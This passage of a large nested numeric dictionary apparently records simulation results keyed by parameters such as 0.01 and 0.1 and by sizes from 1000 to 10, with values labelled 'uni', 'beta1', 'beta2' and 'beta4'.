'beta4': [0.19335453547615575, 4.062291176554196]}, 200: {'uni': 2.585300579248603, 'beta1': 3.8614772252430134, 'beta2': 2.427817506054191, 'beta4': [0.199460824777887, 4.721530100708777]}, 150: {'uni': 1.8997609248765257, 'beta1': 2.003172066142217, 'beta2': 2.9051765798592735, 'beta4': [0.18230429899009304, 3.829273701760521]}, 100: {'uni': 2.225330605252653, 'beta1': 3.1330535103231005, 'beta2': 3.866579491183401, 'beta4': [0.1914076126447997, 5.931444497716789]}, 75: {'uni': 1.9375681374299873, 'beta1': 3.2234217980405666, 'beta2': 2.8971241927601485, 'beta4': [0.1910362420977265, 4.146413907380423]}, 50: {'uni': 2.1226998033229885, 'beta1': 2.5656176115610667, 'beta2': 2.663512620988418, 'beta4': [0.16892315886491896, 4.140040221647824]}, 30: {'uni': 2.7067057347613, 'beta1': 2.114623008671077, 'beta2': 3.0476671138328455, 'beta4': [0.1765011431579746, 3.5581193469388115]}, 20: {'uni': 1.6776878433144786, 'beta1': 2.649907170376919, 'beta2': 3.214279820200537, 'beta4': [0.14485132858460728, 3.385563064254459]}, 10: {'uni': 1.7640526663634954, 'beta1': 2.6540089660589876, 'beta2': 4.178786013879768, 'beta4': [0.20634373982749682, 2.921191233260417]}}}, 0.01: {1000: {1000: {'uni': 0.012988144078803505, 'beta1': 0.00038944275185018686, 'beta2': 0.2739412257196214, 'beta4': [0.001901429926485662, 1.0744670600689628]}, 750: {'uni': 0.018954493311881516, 'beta1': 0.0004064874368649216, 'beta2': 0.28164334341957836, 'beta4': [0.0027292845187166957, 1.0598748530262019]}, 500: {'uni': 0.03227328882297064, 'beta1': 0.0012917244174020107, 'beta2': 0.27037257115863184, 'beta4': [0.0038621658913706495, 1.0547470718911076]}, 400: {'uni': 0.03433464054395813, 'beta1': 0.002369780517218288, 'beta2': 0.28063958889740204, 'beta4': [0.004902554260141074, 1.049709686035498]}, 300: {'uni': 0.03831461561224829, 'beta1': 0.0037592167513096075, 'beta2': 0.29835323043874173, 'beta4': [0.007071102509495777, 1.0426217515350968]}, 200: {'uni': 0.05674481720406174, 'beta1': 0.005284832803397361, 'beta2': 0.3427814820719719, 'beta4': [0.009425129653536651, 1.0391934783953622]}, 150: {'uni': 0.08834898466342368, 'beta1': 0.01244014911343485, 'beta2': 0.3905746763051995, 'beta4': [0.012342493157189289, 1.0348233308668668]}, 100: {'uni': 0.11894024946831482, 'beta1': 0.02444975073959859, 'beta2': 0.44907614468337353, 'beta4': [0.019659596279589155, 1.028889046296725]}, 75: {'uni': 0.1527862700499143, 'beta1': 0.04787451628654083, 'beta2': 0.4787033135597648, 'beta4': [0.029747587227536555, 1.0245077390872745]}, 50: {'uni': 0.2426038704397449, 'beta1': 0.0782378615031597, 'beta2': 0.5218056644958682, 'beta4': [0.041527131802373184, 1.0224094385417244]}, 30: {'uni': 0.3390533680971421, 'beta1': 0.18939106161176048, 'beta2': 0.6846835998957418, 'beta4': [0.056675214880820765, 1.0166970485545934]}, 20: {'uni': 0.45235784655368927, 'beta1': 0.3714038453778036, 'beta2': 0.7011438160594685, 'beta4': [0.08848504553932762, 1.014212197651508]}, 10: {'uni': 0.7798616064607444, 'beta1': 0.6626215824023616, 'beta2': 0.854942257338083, 'beta4': [0.1361740799714233, 1.0112064148732012]}}, 750: {1000: {'uni': 0.014111659450113783, 'beta1': 0.0005193837132983345, 'beta2': 0.3041417560035209, 'beta4': [0.0021059808213720623, 1.089260808726159]}, 750: {'uni': 0.01776621568011013, 'beta1': 0.0005404605453736952, 'beta2': 0.30632535812118766, 'beta4': [0.002608330400828606, 1.075273109299807]}, 500: {'uni': 0.028705411835050567, 'beta1': 0.0009701162458206792, 'beta2': 0.293387533478566, 'beta4': [0.0035869489765737637, 1.0736332892832816]}, 400: {'uni': 0.035925270100480564, 'beta1': 0.002115883346584126, 'beta2': 0.28846361046306584, 'beta4': [0.0053041492994923365, 1.0685684661263208]}, 300: {'uni': 0.04739663294754829, 'beta1': 0.003944792065230057, 'beta2': 0.3262201641618077, 'beta4': [0.005481018761212053, 1.06674288435139]}, 200: {'uni': 0.07323025971109642, 'beta1': 0.007079292499444228, 'beta2': 0.3504479078456703, 'beta4': [0.008241651578483802, 1.0545837824070112]}, 150: {'uni': 0.07891186837596025, 'beta1': 0.019368677322849078, 'beta2': 0.3677325048079892, 'beta4': [0.01125347103088656, 1.0474333377718406]}, 100: {'uni': 0.11954949574624353, 'beta1': 0.02051741147566948, 'beta2': 0.4607118280456165, 'beta4': [0.018024830416066322, 1.038629659877778]}, 75: {'uni': 0.1667857566555556, 'beta1': 0.03694914894551043, 'beta2': 0.4922451884656646, 'beta4': [0.023016121704478844, 1.0328691452557426]}, 50: {'uni': 0.267023428032651, 'beta1': 0.07890588955448231, 'beta2': 0.5378520535647412, 'beta4': [0.03789863377657755, 1.0276001043725385]}, 30: {'uni': 0.33785390816595817, 'beta1': 0.24746683430732205, 'beta2': 0.6249081272448354, 'beta4': [0.06161697678822258, 1.021437251450835]}, 20: {'uni': 0.48292750740180024, 'beta1': 0.2717511395739313, 'beta2': 0.6945127698879909, 'beta4': [0.08268620779342578, 1.0216636840969495]}, 10: {'uni': 0.7248197547615234, 'beta1': 0.6245977329525259, 'beta2': 0.8875678105634364, 'beta4': [0.1421881432843648, 1.0143655081623668]}}, 500: {1000: {'uni': 0.02188975323112398, 'beta1': 0.0017453824253913159, 'beta2': 0.2956035109830917, 'beta4': [0.003767105090318207, 1.1268252528300466]}, 750: {'uni': 0.02357228780744032, 'beta1': 0.0010166197623719666, 'beta2': 0.29909761062079904, 'beta4': [0.004875872603854908, 1.1245773629752243]}, 500: {'uni': 0.026837036395264052, 'beta1': 0.0013010746719904127, 'beta2': 0.3014218767173777, 'beta4': [0.003665030466863662, 1.1012534822690934]}, 400: {'uni': 0.028163152714100657, 'beta1': 0.001967008933802825, 'beta2': 0.2916764354442436, 'beta4': [0.006081151372860138, 1.0973592614277135]}, 300: {'uni': 0.04039589266243756, 'beta1': 0.0025297031214923577, 'beta2': 0.3291987120650441, 'beta4': [0.006762903272845259, 1.0927311729646423]}, 200: {'uni': 0.06381560712414723, 'beta1': 0.008711588337987476, 'beta2': 0.349388068575829, 'beta4': [0.009518281554600943, 1.0705205650736693]}, 150: {'uni': 0.08822872644657972, 'beta1': 0.012625655119434065, 'beta2': 0.36359164688986806, 'beta4': [0.0122975587808102, 1.066828776680399]}, 100: {'uni': 0.12034086569249816, 'beta1': 0.028199486576761034, 'beta2': 0.4013937953505733, 'beta4': [0.019410294600082315, 1.0546743195542243]}, 75: {'uni': 0.15710173020411988, 'beta1': 0.05948850797839798, 'beta2': 0.4602254974955219, 'beta4': [0.025921724099794863, 1.0517010799471413]}, 50: {'uni': 0.2532312265823954, 'beta1': 0.07607149041242904, 'beta2': 0.5570252079040533, 'beta4': [0.033107476011882166, 1.0439643502035127]}, 30: {'uni': 0.3533095624701312, 'beta1': 0.17481473091875682, 'beta2': 0.6082250929487117, 'beta4': [0.06369605726718264, 1.0356758375491901]}, 20: {'uni': 0.4570589338099327, 'beta1': 0.3041261325532901, 'beta2': 0.7013060580251537, 'beta4': [0.09388192904197612, 1.02753591382958]}, 10: {'uni': 0.7060683718900814, 'beta1': 0.6155479784933189, 'beta2': 0.8355785086184536, 'beta4': [0.13642816215229916, 1.0217206967991093]}}, 400: {1000: {'uni': 0.028838920421234225, 'beta1': 0.002023990721398416, 'beta2': 0.3595884886124153, 'beta4': [0.004349264377807316, 1.1499553996186684]}, 750: {'uni': 0.031760309280321905, 'beta1': 0.0017463269958980757, 'beta2': 0.347593944893794, 'beta4': [0.004966482944978197, 1.1387788815091806]}, 500: {'uni': 0.029639682537053992, 'beta1': 0.0021690481189058836, 'beta2': 0.36575693930787684, 'beta4': [0.004787347135222721, 1.143960636467822]}, 400: {'uni': 0.03448428077909005, 'beta1': 0.001679178738135301, 'beta2': 0.3332601516725951, 'beta4': [0.005365773889334185, 1.1224023010554964]}, 300: {'uni': 0.03728507705357348, 'beta1': 0.003421016079149095, 'beta2': 0.35258759568773423, 'beta4': [0.006769452240699886, 1.0992128217714925]}, 200: {'uni': 0.05937386031855901, 'beta1': 0.008088451915504932, 'beta2': 0.34891296908227415, 'beta4': [0.009966202932037182, 1.0926275641542096]}, 150: {'uni': 0.07494825539591718, 'beta1': 0.009900336507182075, 'beta2': 0.3633810337591094, 'beta4': [0.014015410676247208, 1.0756766254279038]}, 100: {'uni': 0.1452740820402087, 'beta1': 0.04566624562697337, 'beta2': 0.4244085797936966, 'beta4': [0.017619373414129016, 1.0838082958740982]}, 75: {'uni': 0.15759696343829202, 'beta1': 0.03295314139475574, 'beta2': 0.49107280365146033, 'beta4': [0.026961926104242254, 1.0616881249470593]}, 50: {'uni': 0.19965377944271542, 'beta1': 0.09170708993967416, 'beta2': 0.5174241834899962, 'beta4': [0.034885863449721756, 1.0533340818568644]}, 30: {'uni': 0.3911037951130236, 'beta1': 0.2008621720408328, 'beta2': 0.5813834794397994, 'beta4': [0.06621448432105294, 1.0418362843449036]}, 20: {'uni': 0.4532644917880779, 'beta1': 0.31046491235637047, 'beta2': 0.6983812924974165, 'beta4': [0.08584145551321705, 1.0397579843043205]}, 10: {'uni': 0.7049112936255675, 'beta1': 0.5619870648762287, 'beta2': 0.8624110416345726, 'beta4': [0.1420336605742772, 1.0260483032144943]}}, 300: {1000: {'uni': 0.0477506434275743, 'beta1': 0.002656018923794836, 'beta2': 0.38169507431662775, 'beta4': [0.006751240462940516, 1.2044384118076963]}, 750: {'uni': 0.035866440402403874, 'beta1': 0.0025682164531108864, 'beta2': 0.34754934812720045, 'beta4': [0.0060399489557519375, 1.1780336640262834]}, 500: {'uni': 0.0429976433778337, 'beta1': 0.0026997677700779025, 'beta2': 0.3497225195634406, 'beta4': [0.007766880718984553, 1.1714570291435575]}, 400: {'uni': 0.03796627964983832, 'beta1': 0.002680918831818506, 'beta2': 0.31845072684018694, 'beta4': [0.007637211923669038, 1.1767951740193134]}, 300: {'uni': 0.047954341706110834, 'beta1': 0.0040228007949967785, 'beta2': 0.3915189178090604, 'beta4': [0.008341049725251948, 1.1413934344116414]}, 200: {'uni': 0.058801039052903466, 'beta1': 0.008131127056643357, 'beta2': 0.3604135850986866, 'beta4': [0.009896706931841125, 1.1266276510964888]}, 150: {'uni': 0.07601882623660774, 'beta1': 0.009681047272849304, 'beta2': 0.3807318897695535, 'beta4': [0.013563834359170562, 1.1052335637146984]}, 100: {'uni': 0.10841635391980659, 'beta1': 0.02419096018981847, 'beta2': 0.42051425698862294, 'beta4': [0.02332073317446744, 1.1007862236489643]}, 75: {'uni': 0.15644575063485539, 'beta1': 0.04333966354385248, 'beta2': 0.4510221433433015, 'beta4': [0.025484265648400898, 1.0826793645564343]}, 50: {'uni': 0.22229790326206228, 'beta1': 0.1194104696114188, 'beta2': 0.4972862665901895, 'beta4': [0.033032126852486986, 1.0680192364892767]}, 30: {'uni': 0.3421584222803109, 'beta1': 0.19426053661209747, 'beta2': 0.5991003031397995, 'beta4': [0.05774687896095791, 1.0585791153399502]}, 20: {'uni': 0.41000310363205883, 'beta1': 0.2872927401171547, 'beta2': 0.6791792500576637, 'beta4': [0.08202980551373394, 1.0494588632705306]}, 10: {'uni': 0.71394883730954, 'beta1': 0.6012605316921776, 'beta2': 0.8215291167423904, 'beta4': [0.13552082196825826, 1.032384877072474]}}, 200: {1000: {'uni': 0.05637428762936589, 'beta1': 0.009217193420871453, 'beta2': 0.4051235658647831, 'beta4': [0.009264717821869932, 1.255668494974553]}, 750: {'uni': 0.06205625295675565, 'beta1': 0.006241707563085184, 'beta2': 0.40628981422557625, 'beta4': [0.01166396870680152, 1.2401049601104341]}, 500: {'uni': 0.06620774051688502, 'beta1': 0.011631472592465388, 'beta2': 0.4086508125338102, 'beta4': [0.007982398419828483, 1.2123535892253303]}, 400: {'uni': 0.0557159019556888, 'beta1': 0.0070003045875467775, 'beta2': 0.4479874895263648, 'beta4': [0.01377141708582481, 1.217623150358333]}, 300: {'uni': 0.057193255915006416, 'beta1': 0.007083152253381874, 'beta2': 0.3989165098362032, 'beta4': [0.009459881899006482, 1.2241605731085128]}, 200: {'uni': 0.0655493345741656, 'beta1': 0.007667494082330394, 'beta2': 0.432352490564409, 'beta4': [0.011521818555387774, 1.179336090260994]}, 150: {'uni': 0.07708595959479046, 'beta1': 0.010004943140099752, 'beta2': 0.41657253266663674, 'beta4': [0.01604343437557773, 1.1583265664784832]}, 100: {'uni': 0.1263165132491358, 'beta1': 0.021544496545364552, 'beta2': 0.4433791705263855, 'beta4': [0.019640660826383667, 1.1432617638709475]}, 75: {'uni': 0.13284213618342994, 'beta1': 0.03353682532833947, 'beta2': 0.4463651381186589, 'beta4': [0.024553127311670607, 1.1144945057044657]}, 50: {'uni': 0.20031721347214956, 'beta1': 0.10486774187747581, 'beta2': 0.5246839387173443, 'beta4': [0.034818327742525974, 1.1157231794606]}, 30: {'uni': 0.31301904620451293, 'beta1': 0.1886326936481399, 'beta2': 0.6187788281549748, 'beta4': [0.061042826858162515, 1.08255899857378]}, 20: {'uni': 0.461074120032512, 'beta1': 0.32435297663532797, 'beta2': 0.6749616321255197, 'beta4': [0.0878038173182829, 1.0723825999562786]}, 10: {'uni': 0.7327323930086018, 'beta1': 0.6021409002552052, 'beta2': 0.8163811901265174, 'beta4': [0.13141861102455427, 1.0566349108690218]}}, 150: {1000: {'uni': 0.067317033122647, 'beta1': 0.014610653548333328, 'beta2': 0.41423990594181115, 'beta4': [0.015195465900901773, 1.2975972495921606]}, 750: {'uni': 0.07134739771277643, 'beta1': 0.01297675226601242, 'beta2': 0.4449985726026145, 'beta4': [0.012702984043174723, 1.332657446897552]}, 500: {'uni': 0.07158654805341536, 'beta1': 0.013205514989078588, 'beta2': 0.47765967888624855, 'beta4': [0.012293972130509437, 1.3157095294645398]}, 400: {'uni': 0.07034182650532116, 'beta1': 0.01407065712769308, 'beta2': 0.4931374751253587, 'beta4': [0.014390288214085094, 1.2612997638466985]}, 300: {'uni': 0.0668930803759735, 'beta1': 0.01552094864787745, 'beta2': 0.4352322164574502, 'beta4': [0.016111201075420335, 1.2999205241316818]}, 200: {'uni': 0.08210671115008272, 'beta1': 0.014309982621535088, 'beta2': 0.4229267072174695, 'beta4': [0.013810958058404505, 1.2279022666381392]}, 150: {'uni': 0.0819048770127292, 'beta1': 0.014083915977824326, 'beta2': 0.4455770748001402, 'beta4': [0.016448989256336397, 1.2261023328679816]}, 100: {'uni': 0.1124619227831381, 'beta1': 0.02212891084615586, 'beta2': 0.43315186256637916, 'beta4': [0.018516927750900816, 1.1990428526671064]}, 75: {'uni': 0.17413627406404164, 'beta1': 0.04830138338528511, 'beta2': 0.4614161459404568, 'beta4': [0.024628147211136243, 1.1682951226810308]}, 50: {'uni': 0.19441361375983962, 'beta1': 0.09555994518728896, 'beta2': 0.5085726037388353, 'beta4': [0.04000423309857408, 1.133646779809821]}, 30: {'uni': 0.3596328489794518, 'beta1': 0.23345596980686195, 'beta2': 0.602035328072322, 'beta4': [0.05595016121396317, 1.1063362253083466]}, 20: {'uni': 0.49940022824485364, 'beta1': 0.2718272917375905, 'beta2': 0.6917953420150722, 'beta4': [0.0888019052729563, 1.0940863023258154]}, 10: {'uni': 0.7640204794969943, 'beta1': 0.60836577588252, 'beta2': 0.8377569007699075, 'beta4': [0.13896115419536065, 1.0695729688122164]}}, 100: {1000: {'uni': 0.11821762730536435, 'beta1': 0.047083881271799286, 'beta2': 0.4767329414414302, 'beta4': [0.019696898025009797, 1.3759780450899495]}, 750: {'uni': 0.166497002146877, 'beta1': 0.030191650365528174, 'beta2': 0.5745771850100575, 'beta4': [0.01874142585554488, 1.4019321119063006]}, 500: {'uni': 0.1141489883572298, 'beta1': 0.022886589383535046, 'beta2': 0.5059188810811766, 'beta4': [0.023892329918408214, 1.4176836808914035]}, 400: {'uni': 0.10757279402523523, 'beta1': 0.025910744712307768, 'beta2': 0.47516791997531455, 'beta4': [0.024887362134068027, 1.3407564518745063]}, 300: {'uni': 0.11205473228712978, 'beta1': 0.027816294963348084, 'beta2': 0.4595203252789575, 'beta4': [0.02102816906813093, 1.3896095092313074]}, 200: {'uni': 0.1392639018340233, 'beta1': 0.03466261671448098, 'beta2': 0.5064836388671088, 'beta4': [0.019827730733462973, 1.320973379428104]}, 150: {'uni': 0.11172731925062222, 'beta1': 0.03045757437870108, 'beta2': 0.5429801538798318, 'beta4': [0.018311927090665446, 1.2966994614956564]}, 100: {'uni': 0.1417705961325182, 'beta1': 0.02776033911186053, 'beta2': 0.5135092406613353, 'beta4': [0.021989948671619727, 1.2844512305552225]}, 75: {'uni': 0.16977766093730104, 'beta1': 0.04538718671723866, 'beta2': 0.5048319481429052, 'beta4': [0.025361562349700335, 1.2253436336047208]}, 50: {'uni': 0.21773281447174667, 'beta1': 0.12655947351187494, 'beta2': 0.5958498671576513, 'beta4': [0.04232872037917144, 1.2340478264352763]}, 30: {'uni': 0.3857845219796272, 'beta1': 0.16290330189484536, 'beta2': 0.5970726414958795, 'beta4': [0.06907454580959214, 1.181378758222426]}, 20: {'uni': 0.5361371234035757, 'beta1': 0.3035233614902238, 'beta2': 0.6522890347608998, 'beta4': [0.0820029520321425, 1.152442746950051]}, 10: {'uni': 0.701243951130363, 'beta1': 0.5876166702780768, 'beta2': 0.8498127976808606, 'beta4': [0.13423588905558106, 1.108482890069536]}}, 75: {1000: {'uni': 0.1504497409553797, 'beta1': 0.05778886589789175, 'beta2': 0.5689795075236423, 'beta4': [0.025579604139058413, 1.502171976116502]}, 750: {'uni': 0.1656421417501711, 'beta1': 0.044118094938877105, 'beta2': 0.5308608243630025, 'beta4': [0.025236193283323678, 1.5214092977699725]}, 500: {'uni': 0.1406288013165275, 'beta1': 0.04710819524731978, 'beta2': 0.6294260138397421, 'beta4': [0.03263872467003944, 1.466691104643992]}, 400: {'uni': 0.15260582744474926, 'beta1': 0.049746732140211046, 'beta2': 0.5786004110828491, 'beta4': [0.03002446814907474, 1.4657161105126315]}, 300: {'uni': 0.17139718657612807, 'beta1': 0.043265461012224546, 'beta2': 0.598207639599414, 'beta4': [0.02535836803938531, 1.4335637902113987]}, 200: {'uni': 0.1621007031460252, 'beta1': 0.060715336606847865, 'beta2': 0.627958646227533, 'beta4': [0.02854988898787995, 1.414080068290809]}, 150: {'uni': 0.15657389926793341, 'beta1': 0.04517196769162301, 'beta2': 0.6008731596546857, 'beta4': [0.024001517469219674, 1.4033912381741407]}, 100: {'uni': 0.20078010791468953, 'beta1': 0.0638685270180855, 'beta2': 0.6024611592669924, 'beta4': [0.026687989153733143, 1.3684372461164178]}, 75: {'uni': 0.19558911614822283, 'beta1': 0.04127156075089937, 'beta2': 0.6219872948600622, 'beta4': [0.02530115353980352, 1.3504751064168508]}, 50: {'uni': 0.24945016241095797, 'beta1': 0.09548932332721162, 'beta2': 0.5704743061455884, 'beta4': [0.03469103695069554, 1.2910941153233388]}, 30: {'uni': 0.3843775697870882, 'beta1': 0.2162354295470449, 'beta2': 0.7225395232778488, 'beta4': [0.06097975411870599, 1.26014709077903]}, 20: {'uni': 0.4608099490730844, 'beta1': 0.377609439074759, 'beta2': 0.6828014075803406, 'beta4': [0.0845414617819174, 1.2220498105221698]}, 10: {'uni': 0.6957575487038375, 'beta1': 0.5817711102357613, 'beta2': 0.8159662327945509, 'beta4': [0.1456865472262332, 1.1761074832049092]}}, 50: {1000: {'uni': 0.2171563016332781, 'beta1': 0.1119882220067852, 'beta2': 0.7295328909426251, 'beta4': [0.036596828296387295, 1.6695178637251924]}, 750: {'uni': 0.31980644420219206, 'beta1': 0.08356402070230286, 'beta2': 0.6568872602016991, 'beta4': [0.03644848778622732, 1.664721881332084]}, 500: {'uni': 0.2787119122221463, 'beta1': 0.08564305576207892, 'beta2': 0.8076205045555513, 'beta4': [0.0372663869694284, 1.5845679652678826]}, 400: {'uni': 0.31512954719118724, 'beta1': 0.09191934849852293, 'beta2': 0.6399963438304054, 'beta4': [0.044356775686283226, 1.6887226611881236]}, 300: {'uni': 0.2978852335601706, 'beta1': 0.11065776415347438, 'beta2': 0.7109359356279316, 'beta4': [0.04377085876988734, 1.6943468662995624]}, 200: {'uni': 0.2698837516337762, 'beta1': 0.08657074634623589, 'beta2': 0.8781098176902961, 'beta4': [0.03965972203722568, 1.6965554757595365]}, 150: {'uni': 0.29282860454290066, 'beta1': 0.12956993080392998, 'beta2': 0.8337280661846921, 'beta4': [0.03678242047033739, 1.5699018695803737]}, 100: {'uni': 0.2996686665157128, 'beta1': 0.09487879758008413, 'beta2': 0.7989016053228302, 'beta4': [0.038780796201137155, 1.4885204427669143]}, 75: {'uni': 0.26825135650124593, 'beta1': 0.1304663803307884, 'beta2': 0.6382631197739325, 'beta4': [0.038703446172140665, 1.548809371611096]}, 50: {'uni': 0.23328719602827164, 'beta1': 0.1279056112762378, 'beta2': 0.7337035166527172, 'beta4': [0.04461719221729034, 1.4355747808596746]}, 30: {'uni': 0.31766342420836724, 'beta1': 0.2073845454902525, 'beta2': 0.8664281705960387, 'beta4': [0.061479928757434674, 1.4337600600297795]}, 20: {'uni': 0.49857944269872956, 'beta1': 0.37194117505787716, 'beta2': 0.7303859611553145, 'beta4': [0.07943618683979671, 1.3507146157854548]}, 10: {'uni': 0.6740063613368987, 'beta1': 0.5875002880392719, 'beta2': 0.8294800540083995, 'beta4': [0.1423435773909963, 1.2455677102577796]}}, 30: {1000: {'uni': 0.4041367657774476, 'beta1': 0.3891252626085872, 'beta2': 0.8917332171691094, 'beta4': [0.06069384516805439, 2.0878809853058136]}, 750: {'uni': 0.6063487450248459, 'beta1': 0.28515250770408407, 'beta2': 0.907323908221825, 'beta4': [0.06777651085585552, 2.165511890410776]}, 500: {'uni': 0.44887745342739666, 'beta1': 0.20142163124187815, 'beta2': 1.0586969462772107, 'beta4': [0.06112703890643645, 1.9450821248923096]}, 400: {'uni': 0.3671219293884009, 'beta1': 0.29439578709842673, 'beta2': 0.8625000041807787, 'beta4': [0.07096987575608635, 2.292088965648115]}, 300: {'uni': 0.5618374463091304, 'beta1': 0.21529313809975378, 'beta2': 0.9323116397814922, 'beta4': [0.060725063535657646, 1.9415618379545583]}, 200: {'uni': 0.46281000290851027, 'beta1': 0.31836371463471935, 'beta2': 1.074339767464387, 'beta4': [0.06544350048523691, 2.4401579712107853]}, 150: {'uni': 0.45065414372867557, 'beta1': 0.2254781448755926, 'beta2': 0.921098529958321, 'beta4': [0.07493682860369427, 1.9884601872702625]}, 100: {'uni': 0.4818990994754038, 'beta1': 0.22179781725829084, 'beta2': 0.9626354691244079, 'beta4': [0.0673868816555839, 1.8541827841878982]}, 75: {'uni': 0.6113357053235765, 'beta1': 0.2970066066146257, 'beta2': 1.107979555092765, 'beta4': [0.07010660573358148, 1.8919338680785487]}, 50: {'uni': 0.4576323533580108, 'beta1': 0.21108840567426887, 'beta2': 1.0350342422943783, 'beta4': [0.07781723853206345, 1.7709725863663965]}, 30: {'uni': 0.4729226012285906, 'beta1': 0.2967398499465227, 'beta2': 1.1720397435138796, 'beta4': [0.10061020478239008, 1.5666290649592491]}, 20: {'uni': 0.5047530706836073, 'beta1': 0.3828449749320704, 'beta2': 0.9959358178346716, 'beta4': [0.09150679086653213, 1.5273098854169376]}, 10: {'uni': 0.7253485793653165, 'beta1': 0.7131398068127759, 'beta2': 1.154279478845462, 'beta4': [0.15865868787798984, 1.4651227700649136]}}, 20: {1000: {'uni': 0.8893011051968421, 'beta1': 0.48029489890964144, 'beta2': 1.138570061072868, 'beta4': [0.12016297491888765, 2.7450044819730346]}, 750: {'uni': 0.7842878860829648, 'beta1': 0.5280047378600626, 'beta2': 0.9907178324045341, 'beta4': [0.08074449655529863, 2.4628845216345465]}, 500: {'uni': 0.6495364657918996, 'beta1': 0.5571645541550105, 'beta2': 1.2153026888564329, 'beta4': [0.11212718774146183, 2.4826912142541158]}, 400: {'uni': 0.6790833244406554, 'beta1': 0.688222696542953, 'beta2': 1.0940594366814973, 'beta4': [0.09612572731484217, 2.6378171658296]}, 300: {'uni': 0.7497979123647319, 'beta1': 0.673346361400717, 'beta2': 1.2111769266572192, 'beta4': [0.10650625900424332, 2.662378719953278]}, 200: {'uni': 0.7782799236279321, 'beta1': 0.5066133040115538, 'beta2': 1.5983486399311722, 'beta4': [0.10154176948982443, 2.18300393332201]}, 150: {'uni': 0.769284858919313, 'beta1': 0.7960425816447904, 'beta2': 1.6078106374025654, 'beta4': [0.09700106178564268, 2.47424633203668]}, 100: {'uni': 0.6623091331581044, 'beta1': 0.5188424165311809, 'beta2': 1.3778317192785996, 'beta4': [0.08048551825905041, 2.5782845351068673]}, 75: {'uni': 0.7617937241966218, 'beta1': 0.5291163469257404, 'beta2': 1.6061108763727754, 'beta4': [0.08975903590242737, 2.325750777699574]}, 50: {'uni': 0.7115988582438708, 'beta1': 0.5693966556621504, 'beta2': 1.3152266488463573, 'beta4': [0.08495826703441907, 2.142722449577546]}, 30: {'uni': 0.7034134256344454, 'beta1': 0.6037393201713395, 'beta2': 1.3551563258206014, 'beta4': [0.0931583019513541, 2.360556989567204]}, 20: {'uni': 0.7100758447852602, 'beta1': 0.6586909629351826, 'beta2': 1.3951430901746895, 'beta4': [0.08885578581538985, 2.13027761302959]}, 10: {'uni': 0.8763687869636916, 'beta1': 0.6621901686619684, 'beta2': 1.4397320052133586, 'beta4': [0.15413113554127414, 1.8900352885932123]}}, 10: {1000: {'uni': 2.0273680826515523, 'beta1': 2.359035556551498, 'beta2': 3.672756126961876, 'beta4': [0.2213782321311552, 4.345382606735576]}, 750: {'uni': 2.3490519213259775, 'beta1': 2.0119800010343014, 'beta2': 2.8645485706294185, 'beta4': [0.23441342363526224, 3.7887379248049053]}, 500: {'uni': 2.389001125272668, 'beta1': 1.8872657257523238, 'beta2': 2.6719189810271513, 'beta4': [0.20011018110379586, 3.6970066494557168]}, 400: {'uni': 2.255684049218137, 'beta1': 2.9094381086720404, 'beta2': 3.0637241743113166, 'beta4': [0.21926471174607634, 5.339869195559868]}, 300: {'uni': 1.7536409747411805, 'beta1': 3.849583292887527, 'beta2': 3.175605250509971, 'beta4': [0.17907412584005683, 4.480746714602472]}, 200: {'uni': 1.773862091385912, 'beta1': 4.078747745882778, 'beta2': 3.461277444009251, 'beta4': [0.19496297219634695, 3.886693122290411]}, 150: {'uni': 2.265039971782233, 'beta1': 3.152798513179202, 'beta2': 3.4393350792778667, 'beta4': [0.15566060788335714, 4.093634455518538]}, 100: {'uni': 2.366653853665828, 'beta1': 4.4934014356822445, 'beta2': 3.800083106177682, 'beta4': [0.16039428725680271, 3.9289581935779605]}, 75: {'uni': 2.2874534331959575, 'beta1': 3.07963290214728, 'beta2': 3.0312126576316696, 'beta4': [0.19916744373968726, 4.206702906032036]}, 50: {'uni': 2.2089566943358725, 'beta1': 4.267458229985183, 'beta2': 3.5008369677013973, 'beta4': [0.17731566928548778, 3.7266964934594444]}, 30: {'uni': 1.882452851274314, 'beta1': 4.000525177515207, 'beta2': 2.51364631796368, 'beta4': [0.16839687927231317, 4.84316434096235]}, 20: {'uni': 2.445988350447573, 'beta1': 4.060592986449134, 'beta2': 3.2062441274392905, 'beta4': [0.21147740634989898, 3.5687642304126617]}, 10: {'uni': 2.2223725240828744, 'beta1': 4.131116767696193, 'beta2': 4.0318674319204195, 'beta4': [0.1798078313871271, 3.0758409111074045]}}}, 0.1: {1000: {1000: {'uni': 0.012708832597304081, 'beta1': 0.00033166037268448316, 'beta2': 0.21460865011093463, 'beta4': [0.0018516899147039188, 1.059075949409259]}, 750: {'uni': 0.015060860054651262, 'beta1': 0.0006641253071293576, 'beta2': 0.2162166847452195, 'beta4': [0.0025527950881468827, 1.0547627588805712]}, 500: {'uni': 0.023939712971963126, 'beta1': 0.0007901604824047292, 'beta2': 0.24516800594107138, 'beta4': [0.004049694984104264, 1.0444988223242697]}, 400: {'uni': 0.027519572187397166, 'beta1': 0.002460002937910002, 'beta2': 0.261583470206204, 'beta4': [0.004661086832628227, 1.0431727643760105]}, 300: {'uni': 0.03627168676673069, 'beta1': 0.003146307185794746, 'beta2': 0.28682321208602907, 'beta4': [0.005410896474224397, 1.0373268243809708]}, 200: {'uni': 0.06606377693153227, 'beta1': 0.007127748304258846, 'beta2': 0.33526098694387013, 'beta4': [0.007843924312649053, 1.031481235215888]}, 150: {'uni': 0.09086736508905224, 'beta1': 0.011997147118561492, 'beta2': 0.39574485872929643, 'beta4': [0.012200131983621673, 1.0273614609515949]}, 100: {'uni': 0.11749233892140523, 'beta1': 0.0254874114936232, 'beta2': 0.40218091488595314, 'beta4': [0.016694345643181282, 1.0227124741537679]}, 75: {'uni': 0.13891536843765345, 'beta1': 0.0422040997632223, 'beta2': 0.4486272343137246, 'beta4': [0.02832653618019821, 1.0204206100863231]}, 50: {'uni': 0.2262449259542918, 'beta1': 0.08429066248193409, 'beta2': 0.5361554713125934, 'beta4': [0.03447726288853555, 1.0163471180661057]}, 30: {'uni': 0.3046689747877375, 'beta1': 0.143070283433812, 'beta2': 0.5687306521971477, 'beta4': [0.05140180541873996, 1.0146360366065286]}, 20: {'uni': 0.4296501536662478, 'beta1': 0.23259937226933894, 'beta2': 0.6661995228128583, 'beta4': [0.06742218487190954, 1.0114185216903036]}, 10: {'uni': 0.6748084625054919, 'beta1': 0.49249563656701206, 'beta2': 0.8271069531483622, 'beta4': [0.1102081844535559, 1.0086284465073807]}}, 750: {1000: {'uni': 0.016825551470189676, 'beta1': 0.0006897508449283568, 'beta2': 0.2633817678529082, 'beta4': [0.002694730956010692, 1.0791736796957117]}, 750: {'uni': 0.014048162967651316, 'beta1': 0.0007569685985984386, 'beta2': 0.23812376536046528, 'beta4': [0.0028744534835104148, 